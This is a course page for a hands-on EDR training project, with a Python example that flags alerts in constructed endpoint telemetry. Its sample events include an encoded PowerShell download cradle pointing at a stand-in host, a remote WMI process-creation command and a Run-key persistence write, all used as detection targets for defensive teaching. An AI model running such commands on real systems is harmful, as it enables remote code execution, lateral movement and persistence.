Hands-on with EDR
Learn how EDR works in real SOC environments by understanding endpoint telemetry, detection logic, and response workflows—followed by hands-on walkthroughs of popular open-source EDR tools.
Overview
Endpoint Detection & Response (EDR) is one of the most critical pillars of modern SOC operations. While logs tell you what happened, EDR shows how it happened: what executed, which process launched it, and what the attacker did next.
In this project, you will:
- Understand what EDR is and why SOCs rely on it
- Learn how EDR differs from traditional antivirus
- Explore how endpoint telemetry is collected and analyzed
- Walk through multiple open-source EDR tools used in real environments
- Understand how EDR alerts feed into SOC triage and incident response
This project is hands-on and practical, preparing you for:
- SOC L1/L2 investigations
- Threat hunting
- Incident response projects
What You'll Learn
- Introduction to Endpoint Detection & Response (EDR): Understand what EDR is and why it is critical for modern SOC operations.
- Endpoint Telemetry & Data Collection: Understand the endpoint data collected, including process, file, registry, and network activity.
- Common EDR Alert Categories: Identify alerts related to suspicious execution, persistence, lateral movement, and malware.
- Open-Source EDR Tools Overview: Explore popular open-source EDR tools and their core use cases.
- Hands-on with Wazuh EDR: Understand how Wazuh detects and alerts on endpoint activity.
- Hands-on with OSQuery for Endpoint Visibility: Learn how OSQuery provides deep visibility by exposing operating-system state (processes, users, listening ports, and more) as tables you query with SQL.
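To make the telemetry and alert categories above concrete, here is an added example, written for this page and not code from the course, Wazuh, or OSQuery. It runs a few toy detection rules over constructed process and registry events in the shape an endpoint agent would report. The field names, process names, pids, paths, the Run-key location and the sample command lines are assumptions made for the illustration; the rules map to three of the alert categories listed above (suspicious execution, persistence, lateral movement), and the process_chain helper rebuilds the parent chain that gives you the "how it happened" view EDR adds over plain logs.

```python
"""Toy EDR detection pass over constructed endpoint telemetry.

Added example for this page; it is not code from the course, Wazuh, or
osquery. The events below are constructed samples (not real captures) whose
field names approximate what an endpoint agent records: process start events
(pid, ppid, image name, parent image, command line) and registry writes. Each
rule is a deliberately simple version of one alert category listed above.
"""
import base64
import re
from typing import Optional

# A PowerShell download cradle, base64-encoded as UTF-16LE the way
# "powershell -EncodedCommand" expects it. Constructed for the sample.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.9/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

# Constructed sample telemetry, one dict per event. Pids, hosts and paths are made up.
EVENTS = [
    {"type": "process", "pid": 4120, "ppid": 3988, "name": "powershell.exe",
     "parent": "winword.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"type": "process", "pid": 5210, "ppid": 640, "name": "svchost.exe",
     "parent": "services.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"type": "process", "pid": 5302, "ppid": 4120, "name": "wmic.exe",
     "parent": "powershell.exe",
     "cmdline": "wmic /node:10.0.0.25 process call create cmd.exe /c whoami"},
    {"type": "registry", "pid": 4120, "action": "write",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "Updater", "data": r"C:\Users\alice\AppData\Roaming\upd.exe"},
    {"type": "process", "pid": 6001, "ppid": 1200, "name": "chrome.exe",
     "parent": "explorer.exe", "cmdline": "chrome.exe --profile-directory=Default"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
RUN_KEYS = (r"\Microsoft\Windows\CurrentVersion\Run",
            r"\Microsoft\Windows\CurrentVersion\RunOnce")
ENC_RE = re.compile(r"(?:-enc|-encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries -enc/-EncodedCommand."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
        return raw.decode("utf-16-le", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def _alert(category: str, event: dict, detail: str) -> dict:
    return {"category": category, "pid": event["pid"], "detail": detail}


def detect(events: list) -> list:
    """Apply the rules to every event and return the alerts raised, in order."""
    alerts = []
    for ev in events:
        if ev["type"] == "process":
            name = ev["name"].lower()
            parent = ev["parent"].lower()
            cmd = ev["cmdline"]
            # suspicious execution: an Office application launching a script host
            if parent in OFFICE_APPS and name in SCRIPT_HOSTS:
                alerts.append(_alert("suspicious_execution", ev, f"{parent} spawned {name}"))
            # suspicious execution: encoded PowerShell, decoded so the analyst sees the payload
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                alerts.append(_alert("suspicious_execution", ev, f"encoded PowerShell: {decoded}"))
            # lateral movement: WMI process creation aimed at a remote host
            if name == "wmic.exe" and "/node:" in cmd.lower() and "process call create" in cmd.lower():
                alerts.append(_alert("lateral_movement", ev, "WMI remote process creation"))
        elif ev["type"] == "registry" and ev["action"] == "write":
            # persistence: any value written under a Run/RunOnce key
            if ev["key"].endswith(RUN_KEYS):
                alerts.append(_alert("persistence", ev,
                                     f"Run key value {ev['value']!r} -> {ev['data']}"))
    return alerts


def process_chain(events: list, pid: int) -> list:
    """Walk ppid links upward from pid: the parent chain behind an alert."""
    by_pid = {e["pid"]: e for e in events if e["type"] == "process"}
    chain = []
    cur = by_pid.get(pid)
    while cur is not None:
        chain.append(cur["name"])
        nxt = by_pid.get(cur["ppid"])
        if nxt is None:
            chain.append(cur["parent"])  # parent's own start event is not in the sample
        cur = nxt
    return chain


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"[{a['category']}] pid={a['pid']} {a['detail']}")
    print("chain for pid 5302:", " <- ".join(process_chain(EVENTS, 5302)))
```

Run it with python3 and it prints four alerts plus the chain wmic.exe <- powershell.exe <- winword.exe for the WMI event. In a real deployment the same fields arrive under different names (for example from Sysmon through Wazuh, or from osquery's processes table), the rules are far more numerous, and each one is tuned against legitimate activity before it is allowed to page an analyst.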
About Trainer
Rajneesh Gupta
Rajneesh Gupta is a seasoned cybersecurity professional with over 11 years of industry experience. With a remarkable career focused on incident response, penetration testing, security compliance, and risk management, Rajneesh has established himself as a leading expert in the field. He is also an accomplished author, having penned the book "Hands-on with Blockchain and Cybersecurity". As a dedicated educator, Rajneesh has made a significant impact on the cybersecurity community by training over 60,000 students globally.
Related Projects
Hands-on with SOAR
Learn how SOAR platforms automate SOC operations by orchestrating tools, enriching alerts, and executing response actions—through hands-on walkthroughs of n8n, Shuffle, and Tines.
Windows Fundamentals
Master the core Windows skills required for SOC Analysts, Security Engineers, IT Administrators, and Cloud Professionals through fully hands-on, task-based labs.
Introduction to SOC (Security Operations Center)
Understand how a real-world Security Operations Center (SOC) operates by learning its purpose, people, tools, processes, data flow, alerts, and business impact through structured, concept-driven tasks.